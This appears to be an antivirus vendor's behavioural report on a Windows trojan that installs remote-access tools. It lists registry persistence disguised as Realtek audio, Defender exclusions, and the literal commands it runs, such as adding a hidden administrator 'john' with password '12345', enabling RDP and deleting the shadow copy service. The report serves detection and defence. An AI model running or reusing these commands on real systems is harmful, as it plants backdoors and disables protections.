Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'Realtek HD Audio' = '%PROGRAMDATA%\RealtekHD\taskhostw.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Realtek HD Audio' = '%PROGRAMDATA%\RealtekHD\taskhostw.exe'
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\RManService] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\RManService] 'ImagePath' = '%PROGRAMDATA%\Windows\rutserv.exe'
Malicious functions
To complicate detection of its presence in the operating system,
forces the system hide from view:
- hidden files
blocks the following features:
- User Account Control (UAC)
modifies the following system settings:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%' = 'System'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%' = 'System'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>' = 'SystemHD'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>' = 'SystemHD'
Executes the following
- '%WINDIR%\syswow64\taskkill.exe' /f /im Rar.exe
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
Searches for registry branches where third party applications store passwords
- [<HKCU>\Software\Microsoft\Windows Mail]
Modifies file system
Creates the following files
- %PROGRAMDATA%\microsoft\check\check.txt
- C:\rdp\rar.exe
- C:\rdp\run.vbs
- C:\rdp\db.rar
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\desktop.ini
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- <LS_APPDATA>\microsoft\windows\history\low\desktop.ini
- <LS_APPDATA>\microsoft\windows\history\low\history.ie5\desktop.ini
- %PROGRAMDATA%\microsoft\intel\r8.exe
- C:\rdp\pause.bat
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\8outj2m4\desktop.ini
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\bx9jw7dq\desktop.ini
- %APPDATA%\microsoft\windows\cookies\low\index.dat
- <LS_APPDATA>\microsoft\windows\history\low\history.ie5\index.dat
- %PROGRAMDATA%\microsoft\temp\log.txt
- nul
- C:\rdp\bat.bat
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\42pgefij\desktop.ini
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\ggqcc0h3\desktop.ini
- %TEMP%\aut575f.tmp
- %PROGRAMDATA%\realtekhd\taskhostw.exe
- %TEMP%\aut4a5e.tmp
- %PROGRAMDATA%\microsoft\temp\clean.bat
- %TEMP%\aut2c43.tmp
- %PROGRAMDATA%\microsoft\temp\h.bat
- %TEMP%\aut2c73.tmp
- %PROGRAMDATA%\microsoft\temp\temp.bat
- %TEMP%\aut2cb2.tmp
- %PROGRAMDATA%\microsoft\temp\5.xml
- %TEMP%\aut328f.tmp
- %TEMP%\aut2c13.tmp
- %PROGRAMDATA%\install\taskhosts.exe
- %PROGRAMDATA%\windows\rfusclient.exe
- %PROGRAMDATA%\windows\rutserv.exe
- %PROGRAMDATA%\windows\winit.exe
- %PROGRAMDATA%\windows\vp8decoder.dll
- %PROGRAMDATA%\windows\vp8encoder.dll
- %PROGRAMDATA%\windows\reg1.reg
- %PROGRAMDATA%\windows\reg2.reg
- %PROGRAMDATA%\windows\install.vbs
- %PROGRAMDATA%\windows\install.bat
- C:\rdp\rdpwinst.exe
- C:\rdp\install.vbs
Sets the 'hidden' attribute to the following files
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\desktop.ini
- %PROGRAMDATA%\microsoft\intel\r8.exe
- <LS_APPDATA>\microsoft\windows\history\low\desktop.ini
- %PROGRAMDATA%\windows\winit.exe
- %PROGRAMDATA%\windows\vp8encoder.dll
- %PROGRAMDATA%\windows\vp8decoder.dll
- %PROGRAMDATA%\windows\rutserv.exe
- %PROGRAMDATA%\windows\rfusclient.exe
- %PROGRAMDATA%\windows\reg2.reg
- %PROGRAMDATA%\windows\reg1.reg
- %PROGRAMDATA%\windows\install.vbs
- %PROGRAMDATA%\windows\install.bat
- <LS_APPDATA>\microsoft\windows\history\low\history.ie5\desktop.ini
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\bx9jw7dq\desktop.ini
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\8outj2m4\desktop.ini
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\ggqcc0h3\desktop.ini
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\42pgefij\desktop.ini
- <LS_APPDATA>\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %PROGRAMDATA%\realtekhd\taskhostw.exe
- %PROGRAMDATA%\microsoft\check\check.txt
Deletes the following files
- %TEMP%\aut2c13.tmp
- %TEMP%\aut2c43.tmp
- %TEMP%\aut2c73.tmp
- %TEMP%\aut2cb2.tmp
- %TEMP%\aut328f.tmp
- %TEMP%\aut4a5e.tmp
- %TEMP%\aut575f.tmp
- C:\rdp\run.vbs
- %PROGRAMDATA%\windows\winit.exe
- C:\rdp\rdpwinst.exe
- C:\rdp\db.rar
- C:\rdp\rar.exe
- C:\rdp\install.vbs
Substitutes the following files
- %PROGRAMDATA%\ntuser.pol
- %HOMEPATH%\ntuser.pol
Network activity
UDP
- DNS ASK ip###ger.org
- DNS ASK rm#####ver.tektonit.ru
- DNS ASK ip##pi.com
- DNS ASK ta###ostw.com
- DNS ASK fr######.freehost.com.ua
Miscellaneous
Searches for the following windows
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: '' WindowName: ''
Creates and executes the following
- '%PROGRAMDATA%\install\taskhosts.exe' -pnaxui
- '%PROGRAMDATA%\microsoft\intel\r8.exe'
- '%WINDIR%\syswow64\wscript.exe' "%PROGRAMDATA%\Windows\install.vbs"
- '%PROGRAMDATA%\windows\winit.exe'
- 'C:\rdp\rar.exe' e -p555 db.rar
- '%PROGRAMDATA%\realtekhd\taskhostw.exe'
- '%PROGRAMDATA%\windows\rutserv.exe' /firewall
- '%PROGRAMDATA%\windows\rutserv.exe' /silentinstall
- '%WINDIR%\syswow64\wscript.exe' "C:\rdp\install.vbs"
- '%PROGRAMDATA%\windows\rutserv.exe' /start
- '%PROGRAMDATA%\windows\rutserv.exe'
- '%PROGRAMDATA%\windows\rfusclient.exe'
- '%PROGRAMDATA%\windows\rfusclient.exe' /tray
- '%WINDIR%\syswow64\wscript.exe' "C:\rdp\run.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c ""%PROGRAMDATA%\Windows\install.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ipconfig /flushdns' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c gpupdate /force' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\rdp\pause.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c sc delete swprv' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\rdp\bat.bat" "' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c ""%PROGRAMDATA%\Windows\install.bat" "
- '%WINDIR%\syswow64\net1.exe' localgroup "Администраторы" "John" /add
- '%WINDIR%\syswow64\net.exe' localgroup "Administratorzy" "John" /add
- '%WINDIR%\syswow64\net1.exe' localgroup "Administratorzy" "John" /add
- '%WINDIR%\syswow64\net.exe' localgroup "Administrators" John /add
- '%WINDIR%\syswow64\net1.exe' localgroup "Administrators" John /add
- '%WINDIR%\syswow64\net.exe' localgroup "Administradores" John /add
- '%WINDIR%\syswow64\net1.exe' localgroup "Administradores" John /add
- '%WINDIR%\syswow64\net.exe' localgroup "Пользователи удаленного рабочего стола" John /add
- '%WINDIR%\syswow64\net1.exe' localgroup "Пользователи удаленного рабочего стола" John /add
- '%WINDIR%\syswow64\net.exe' localgroup "Пользователи удаленного управления" John /add
- '%WINDIR%\syswow64\net.exe' localgroup "Remote Desktop Users" John /add
- '%WINDIR%\syswow64\attrib.exe' +s +h "C:\rdp"
- '%WINDIR%\syswow64\net1.exe' localgroup "Remote Desktop Users" John /add
- '%WINDIR%\syswow64\net.exe' localgroup "Usuarios de escritorio remoto" John /add
- '%WINDIR%\syswow64\net1.exe' localgroup "Usuarios de escritorio remoto" John /add
- '%WINDIR%\syswow64\net.exe' localgroup "Uzytkownicy pulpitu zdalnego" John /add
- '%WINDIR%\syswow64\net1.exe' localgroup "Uzytkownicy pulpitu zdalnego" John /add
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\net.exe' accounts /maxpwage:unlimited
- '%WINDIR%\syswow64\net1.exe' accounts /maxpwage:unlimited
- '%WINDIR%\syswow64\attrib.exe' +s +h "%ProgramFiles%\RDP Wrapper\*.*"
- '%WINDIR%\syswow64\attrib.exe' +s +h "%ProgramFiles%\RDP Wrapper"
- '%WINDIR%\syswow64\net.exe' localgroup "Администраторы" "John" /add
- '%WINDIR%\syswow64\net1.exe' localgroup "Пользователи удаленного управления" John /add
- '%WINDIR%\syswow64\net1.exe' user "john" "12345" /add
- '<SYSTEM32>\cmd.exe' /c ipconfig /flushdns
- '%WINDIR%\syswow64\regedit.exe' /s "reg1.reg"
- '%WINDIR%\syswow64\regedit.exe' /s "reg2.reg"
- '%WINDIR%\syswow64\timeout.exe' 2
- '%WINDIR%\syswow64\cmd.exe' /c sc delete swprv
- '%WINDIR%\syswow64\sc.exe' delete swprv
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\syswow64\WININET.dll",DispatchAPICall 1
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\rdp\pause.bat" "
- '%WINDIR%\syswow64\timeout.exe' 3
- '%WINDIR%\syswow64\chcp.com' 1251
- '%WINDIR%\syswow64\attrib.exe' +H +S %PROGRAMDATA%\Windows\*.*
- '<SYSTEM32>\cmd.exe' /c gpupdate /force
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '%WINDIR%\syswow64\attrib.exe' +H +S %PROGRAMDATA%\Windows
- '%WINDIR%\syswow64\sc.exe' failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\ipconfig.exe' /flushdns
- '<SYSTEM32>\rundll32.exe' "<SYSTEM32>\WININET.dll",DispatchAPICall 1
- '%WINDIR%\syswow64\sc.exe' config RManService obj= LocalSystem type= interact type= own
- '%WINDIR%\syswow64\sc.exe' config RManService DisplayName= "Microsoft Framework"
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\rdp\bat.bat" "
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\net.exe' user "john" "12345" /add
- '<SYSTEM32>\raserver.exe' /offerraupdate
